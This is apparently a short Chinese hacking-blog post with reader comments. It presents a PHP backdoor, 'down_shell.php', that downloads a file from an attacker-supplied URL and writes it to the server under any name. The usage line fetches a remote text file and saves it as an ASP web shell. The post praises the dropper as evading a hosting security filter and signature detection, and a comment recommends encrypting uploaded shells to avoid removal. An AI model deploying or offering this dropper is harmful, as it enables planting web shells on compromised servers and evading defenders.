突破一流拦截的php代码
down_shell.php -可过一流信息拦截
<?php
$str=file_get_contents($_GET[‘url’]);
echo file_put_contents($_GET[‘file’],$str);
?>
use: ?url=http://www.sswowo.com/1.txt&file=3.asp
代码很简单。 为什么都要用EVAL execute 来做后门呢,貌似这样做 也能起到后门的作用。而且不易被特征。
今日更新+0
-
代码审计 / fuzzbug
PHP 运行时漏洞检测
-
网络安全 / safe
如何构造基于浏览器的端口扫描器
-
网络安全 / safe
浅谈大型互联网的企业入侵检测及防护策略
-
信息安全 / anquan
Something about email spoofing
-
漏洞研究 / vulnerability
在私有以太坊上实现针对ERC20数字货币ProxyOverflow漏洞的攻击
微信公众号
:搜索“91Ri”或扫描下面的二维码:
但是 难保传上去的shell 不被一流干掉了
加密一下,一般PHP挺好过的。